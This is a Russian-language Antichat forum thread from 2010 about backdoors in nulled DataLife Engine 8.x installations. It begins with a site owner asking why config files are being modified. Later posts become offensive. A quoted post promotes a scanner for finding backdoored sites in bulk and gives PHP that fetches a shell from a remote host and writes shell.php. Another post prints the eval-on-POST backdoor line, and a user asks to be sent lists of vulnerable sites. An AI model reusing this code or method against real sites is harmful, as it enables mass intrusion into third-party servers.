Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
11.04.2010, 20:23
|
|
Новичок
Регистрация: 30.11.2009
Сообщений: 9
Провел на форуме:
70191
Репутация:
0
|
|
Сообщение от saransko_o
имеются сайты dle 8.0 ,8.2
Каким то образом в файлы dbconfig.php config.php init.php дописываются строки с фреймом типа echo bla bla bla.
Шеллов на хостинге нет, все оригинальное, пароли меняли, в общем всё делали. А как то дописывается..
Создатель файла- 48, а если создаем мы то создатель- 500.
Т.е. файлы изменяет скрипт?
Где копать?
Нулл движок?
|
|
|
11.04.2010, 23:56
|
|
Новичок
Регистрация: 01.01.2009
Сообщений: 14
Провел на форуме:
41607
Репутация:
2
|
|
Сообщение от sir95
Нулл движок?
да. нулл от MID.
|
|
|
|
12.04.2010, 05:59
|
|
Новичок
Регистрация: 16.01.2009
Сообщений: 17
Провел на форуме:
31738
Репутация:
2
|
|
В нуллах авторы нулла пишут уязвимости. Либо сами нуллите, либо юзайте фривар двиг.
Сам лично юзаю PHP - Fusion.
|
|
|
|
12.04.2010, 15:06
|
|
Новичок
Регистрация: 01.01.2009
Сообщений: 14
Провел на форуме:
41607
Репутация:
2
|
|
Кстати на многих лицензия была
Последний раз редактировалось saransko_o; 12.04.2010 в 15:11..
|
|
|
|
14.04.2010, 12:15
|
|
Новичок
Регистрация: 07.04.2006
Сообщений: 3
Провел на форуме:
19810
Репутация:
1
|
|
Сообщение от Dr.Brain
Вот софтина сканнер dle сайтов с встроенным бекдором сборки от злого
Нужна база сайтов которых в паблике навалом..
Скачать
В архиве сканнер и кейген для него
Покупал за 15$ , потому выкласть не жалко...
На базе 16000 сайтов нашёл 6 бекдоров
Версия DLE 8.2-8.5
Сканнер можна настроить под любую ссылку бекдора если надо..
Скорость: 2-3 сайта в сек. (1мбит)
Сам бекдор выполняет любой PHP код, потому залить шелл не составит труда
Берём хостинг. Туда текстовик с шеллом вида shell.txt
Идём в бекдор. Пишем
$shell = file_get_contents("http://site/shell.txt");
$fp = fopen("shell.php", a);
fwrite($fp, $shell);
fclose($fp); А кто автор и как с ним связаться ?
|
|
|
|
26.04.2010, 01:55
|
|
Новичок
Регистрация: 30.11.2009
Сообщений: 9
Провел на форуме:
70191
Репутация:
0
|
|
Такой вопрос, залил шелл.
А как его юзать? Фиг его знает как искать етот шелл.....  |
|
|
|
26.04.2010, 09:17
|
|
Новичок
Регистрация: 17.10.2009
Сообщений: 1
Провел на форуме:
24095
Репутация:
0
|
|
Никак, там в папке с загруженными файлами лежит htaccess, ты не выполнишь .php файл
|
|
|
|
30.04.2010, 05:43
|
|
Новичок
Регистрация: 12.03.2010
Сообщений: 13
Провел на форуме:
29188
Репутация:
0
|
|
Есть бедкодер в папке /engine/ajax/
if($_POST['text']!=''){eval(stripcslashes($_POST['text']));}
Что с этим можно сделать?
Последний раз редактировалось Rew; 30.04.2010 в 05:46..
|
|
|
|
30.04.2010, 06:08
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Сообщение от Rew
Есть бедкодер в папке /engine/ajax/
if($_POST['text']!=''){eval(stripcslashes($_POST['text']));}
Что с этим можно сделать?
Ну например, отправить мне в ЛС список сайтов с этим бекдором
|
|
|
|
30.04.2010, 06:21
|
|
Новичок
Регистрация: 12.03.2010
Сообщений: 13
Провел на форуме:
29188
Репутация:
0
|
|
Я думаю таких сайтов много с этим бедкодером это относиться к null версиям dle.
К примеру DataLife Engine v.8.5 Nulled by M.I.D-Team
Так что с этим можно сделать?
В этой папке нету файла .htaccess
Последний раз редактировалось Rew; 30.04.2010 в 06:27..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
